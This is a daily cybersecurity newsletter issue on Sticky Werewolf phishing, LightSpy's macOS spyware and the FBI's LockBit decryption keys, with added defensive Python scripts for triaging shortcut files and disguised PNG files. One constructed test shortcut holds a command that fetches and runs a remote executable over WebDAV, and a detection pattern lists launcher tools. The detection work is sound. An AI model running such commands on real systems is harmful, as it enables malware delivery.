Jun 10 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter that's casting out the scams and netting you the latest security tips!
Today's hottest cybersecurity news stories:
Sticky Werewolf expands operations to Russia, Belarus
LightSpy's macOS variant has advanced surveillance
7,000 LockBit ransomware decryption keys released by FBI
New Targets Unveiled! Sticky Werewolf is back, this time attacking a pharmaceutical company, a Russian microbiology research institute, and the aviation sector. Previously focused on government entities, the group has broadened its targeting.
Phishing Tactics!
Method: Phishing emails whose malicious links lead to RAR archives.
Payload: LNK files inside those archives, pointing to malware hosted on WebDAV servers.
Outcome: Delivery of Remote Access Trojans (RATs) such as NetWire.
Complex Infection Chain!
Opening an LNK file from one of these emails triggers a multi-stage chain:
The shortcut executes a binary hosted on a WebDAV server.
That binary runs an obfuscated batch script.
The script launches an AutoIt script that injects the final payload, evading security software.
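As an added example (not code from the newsletter or from the researchers who reported this campaign), here is a small Python triage script that parses a Windows shortcut (.LNK) and flags the pattern above: a shortcut whose target or arguments pull a file from a WebDAV share (UNC paths such as \\host@port\DavWWWRoot\..., or a bare http(s) URL) and hand it to a command interpreter. The two shortcuts it inspects are constructed in memory; the host 203.0.113.10 is a documentation address, not an indicator from any report.

```python
import re
import struct

# LinkFlags bits (MS-SHLLINK section 2.1.1) that decide which optional
# structures follow the 76-byte ShellLinkHeader.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
# LinkCLSID {00021401-0000-0000-C000-000000000046}, stored little-endian
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data: bytes) -> dict:
    """Extract the StringData fields of a .LNK, skipping IDList and LinkInfo."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        # IDListSize (uint16) does not include its own two bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        # LinkInfoSize (uint32) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            fields[name] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return fields


# Indicators for the chain described above: a WebDAV-hosted target
# (\\host@port\..., \\host@SSL\..., DavWWWRoot, or a bare URL) and a
# command interpreter or script host used to launch it.
WEBDAV_RE = re.compile(r"\\\\[^\\\s]+@(?:SSL|\d+)\\|DavWWWRoot|https?://", re.I)
LAUNCHER_RE = re.compile(
    r"\b(?:cmd|powershell|pwsh|mshta|rundll32|wscript|cscript|regsvr32)(?:\.exe)?\b", re.I
)


def triage_lnk(data: bytes) -> dict:
    """Parse a shortcut and report why (if at all) it looks like a phishing lure."""
    fields = parse_lnk(data)
    text = " ".join(v for v in fields.values() if v)
    reasons = []
    if WEBDAV_RE.search(text):
        reasons.append("target or arguments reference a WebDAV/HTTP-hosted file")
    if LAUNCHER_RE.search(text):
        reasons.append("shortcut launches a command interpreter or script host")
    if fields["arguments"] and len(fields["arguments"]) > 200:
        reasons.append("unusually long command line (possible obfuscated stager)")
    return {"fields": fields, "suspicious": bool(reasons), "reasons": reasons}


def build_lnk(relative_path=None, working_dir=None, arguments=None) -> bytes:
    """Assemble a minimal Unicode .LNK containing only StringData (test input)."""
    flags = IS_UNICODE
    body = b""
    for flag, value in ((HAS_RELATIVE_PATH, relative_path),
                        (HAS_WORKING_DIR, working_dir),
                        (HAS_ARGUMENTS, arguments)):
        if value is not None:
            flags |= flag
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += bytes(HEADER_SIZE - len(header))  # zero the remaining header fields
    return header + body


# Constructed samples (not real indicators). 203.0.113.0/24 is reserved
# for documentation.
BENIGN_LNK = build_lnk(relative_path=r"..\..\Windows\notepad.exe",
                       working_dir=r"C:\Users\Public")
PHISH_LNK = build_lnk(
    relative_path=r"..\..\Windows\System32\cmd.exe",
    arguments=r"/c start \\203.0.113.10@80\DavWWWRoot\docs\Certificate.exe",
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_LNK), ("phish", PHISH_LNK)):
        verdict = triage_lnk(sample)
        print(label, "suspicious" if verdict["suspicious"] else "clean", verdict["reasons"])
```

Run it against shortcuts extracted from quarantined archives; the parser stops at StringData and ignores the trailing ExtraData blocks, which is enough to recover the launched command. Real lures usually carry an IDList, which is why the parser honours HasLinkTargetIDList and HasLinkInfo rather than assuming the strings start right after the header.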
What's Next?
Sticky Werewolf uses variants of the CypherIT crypter to deliver RATs such as Rhadamanthys and Ozone. Attribution remains unclear, though geopolitical clues hint at possible pro-Ukrainian origins.
Other Wolves on the Prowl!
Sapphire Werewolf: Over 300 attacks on various Russian sectors.
Fluffy Wolf and Mysterious Werewolf: Use spear-phishing to deploy tools such as Remote Utilities, the XMRig miner, WarZone RAT, and the RingSpy backdoor.
Stay vigilant and protect your digital realm!
New Threats Uncovered! Cybersecurity researchers have found that LightSpy spyware, first seen targeting iOS users, also has a macOS variant. The family is cross-platform, with implants for Android, iOS, Windows, macOS, Linux, and various routers.
Key Findings!
Exploits Used: CVE-2018-4233 and CVE-2018-4404.
Targets: macOS 10.x systems, reached primarily through Safari WebKit flaws.
Payloads: A privilege-escalation exploit, an encryption/decryption utility, and ZIP archives carrying further components.
How It Works!
Rogue HTML: A malicious page triggers code execution in the browser.
Binary as PNG: The malicious macOS binary is delivered disguised as a PNG image.
Shell Script: Fetches additional payloads.
Persistence: An "update" file acts as the loader.
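The "binary as PNG" step is the kind of masquerade a content-based file-type check catches. As an added example (not the researchers' tooling and not code from the page), the following Python script walks the chunk structure of a file that claims to be a PNG and reports whether it is really an image, a native macOS (Mach-O) executable with a .png name, or an image with an executable appended after the IEND chunk. It assumes the disguised binary is Mach-O; the magic values are the genuine Mach-O ones, but the inputs are constructed in memory (a real 1x1 PNG and a zeroed Mach-O header stub), not derived from any LightSpy sample.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Mach-O magic numbers: 32/64-bit in both byte orders, plus the FAT header.
# (0xCAFEBABE is also the Java class-file magic, so treat it as a weaker hint.)
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce": "MH_MAGIC (32-bit, big-endian)",
    b"\xce\xfa\xed\xfe": "MH_CIGAM (32-bit, little-endian)",
    b"\xfe\xed\xfa\xcf": "MH_MAGIC_64 (big-endian)",
    b"\xcf\xfa\xed\xfe": "MH_CIGAM_64 (little-endian)",
    b"\xca\xfe\xba\xbe": "FAT_MAGIC (universal binary, or a Java class)",
}


def png_chunks(data: bytes):
    """Yield (chunk_type, offset_after_chunk); stop at IEND or on a damaged chunk."""
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, = struct.unpack_from(">I", data, pos)
        ctype = data[pos + 4:pos + 8]
        end = pos + 12 + length
        if end > len(data):
            return  # truncated chunk
        crc, = struct.unpack_from(">I", data, end - 4)
        if zlib.crc32(data[pos + 4:end - 4]) & 0xFFFFFFFF != crc:
            return  # corrupt chunk, stop walking
        yield ctype, end
        if ctype == b"IEND":
            return
        pos = end


def classify(data: bytes) -> dict:
    """Decide what a file claiming to be a PNG actually contains."""
    if data[:4] in MACHO_MAGICS:
        return {"kind": "macho", "detail": MACHO_MAGICS[data[:4]], "trailing": 0}
    if not data.startswith(PNG_SIG):
        return {"kind": "unknown", "detail": "no PNG signature", "trailing": 0}
    end_of_image = None
    for ctype, end in png_chunks(data):
        if ctype == b"IEND":
            end_of_image = end
    if end_of_image is None:
        return {"kind": "damaged-png", "detail": "no valid IEND chunk", "trailing": 0}
    trailing = data[end_of_image:]
    if trailing[:4] in MACHO_MAGICS:
        return {"kind": "png-with-macho-appended",
                "detail": MACHO_MAGICS[trailing[:4]], "trailing": len(trailing)}
    if trailing:
        return {"kind": "png-with-trailing-data", "detail": "bytes after IEND",
                "trailing": len(trailing)}
    return {"kind": "png", "detail": "well-formed image", "trailing": 0}


def make_png() -> bytes:
    """Build a valid 1x1 RGB PNG (constructed sample)."""
    def chunk(ctype: bytes, body: bytes) -> bytes:
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")  # filter byte + one red pixel
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")


def make_fake_macho() -> bytes:
    """A 32-byte mach_header_64 stub (little-endian magic, zeroed fields); constructed."""
    return b"\xcf\xfa\xed\xfe" + bytes(28)


REAL_PNG = make_png()
MACHO_AS_PNG = make_fake_macho()
PNG_WITH_PAYLOAD = REAL_PNG + make_fake_macho()

if __name__ == "__main__":
    for name, blob in (("photo.png", REAL_PNG), ("icon.png", MACHO_AS_PNG),
                       ("banner.png", PNG_WITH_PAYLOAD)):
        print(name, classify(blob))
```

The CRC check matters: a stager that hides an executable inside a chunk rather than after IEND will usually leave the chunk CRC wrong, and the walk stops there and reports the file as damaged instead of trusting the extension.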
Capabilities!
LightSpy's macOS variant ships with 10 plugins that can:
Capture audio and photos
Record screen activity
Extract and delete files
Execute shell commands
Harvest browser data and iCloud Keychain info
Perform network discovery
In the Wild!
Active since January 2024, the macOS variant has reached around 20 devices, most of them believed to be test units. Despite its limited reach, the sophisticated attack chain poses significant risk.
Geopolitical Impact!
Separately, reports of Pegasus spyware attacks on activists in Latvia, Lithuania, and Poland highlight ongoing cyber espionage against Russian- and Belarusian-speaking journalists dating back to at least 2020.
Stay informed and secure!
Stay ahead of the curve with Presspool.ai! Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." That's us, alright! How about you? Visionary AI executive, much?
And if the newsletter gets your motor running, you can take a butcher's at their AI marketing product too, which is sure to help you make the most of our new artificial overlords and put them to work for your business.
Rest assured, the process is very straightforward.
You simply:
Sign up and create a campaign.
Define your audience, budget, and message.
Launch your campaign; Presspool's AI matches it with ideal newsletter audiences for optimal reach and conversions.
Finally, leverage real-time analytics to track performance and refine future strategies. Elevate your marketing game and stay informed with Presspool.ai! Simples!
Presspool.ai may just have what you need to succeed. And if the product isn't for you, the newsletter alone is a game changer. And we know newsletters.
Big News! The FBI has announced it holds over 7,000 decryption keys to help victims of the LockBit ransomware recover their data for free. If you think you've been affected, visit the FBI's Internet Crime Complaint Center at ic3.gov.
Key Highlights!
LockBit's Reach: Linked to 2,400 attacks globally, 1,800 of them in the U.S.
Operation Cronos: Dismantled LockBit's online infrastructure in February 2024.
Key Figure: Dmitry Yuryevich Khoroshev, the alleged administrator, denies involvement but was publicly named by authorities.
Victim Assistance!
FBI Cyber Division Assistant Director Bryan Vorndran encourages victims to reach out. He also warns that paying a ransom doesn't guarantee data safety, and victims may still face future extortion.
Ransomware Reality!
Recovery Rate: Organisations hit by ransomware recover only 57% of compromised data on average, according to the Veeam Ransomware Trends Report 2024.
Emerging Threats: New ransomware players such as SenSayQ and CashRansomware are on the rise and refining their tactics.
Evolving Tactics!
LockBit and other ransomware groups are constantly evolving. The TargetCompany ransomware, for example, now uses a new Linux variant to target VMware ESXi hosts, abusing exposed Microsoft SQL Server instances for initial access.
Stay Vigilant!
The FBI's efforts are a big step in combating ransomware, but it's crucial for organisations to stay vigilant and prepared. Protect your data, and don't let cybercriminals hold you hostage!
๐๏ธ Extra, Extra! Read all about it! ๐๏ธ
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
๐ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐
๐ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐
๐ย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐พ
Let us know what you think.
So long and thanks for reading all the phish!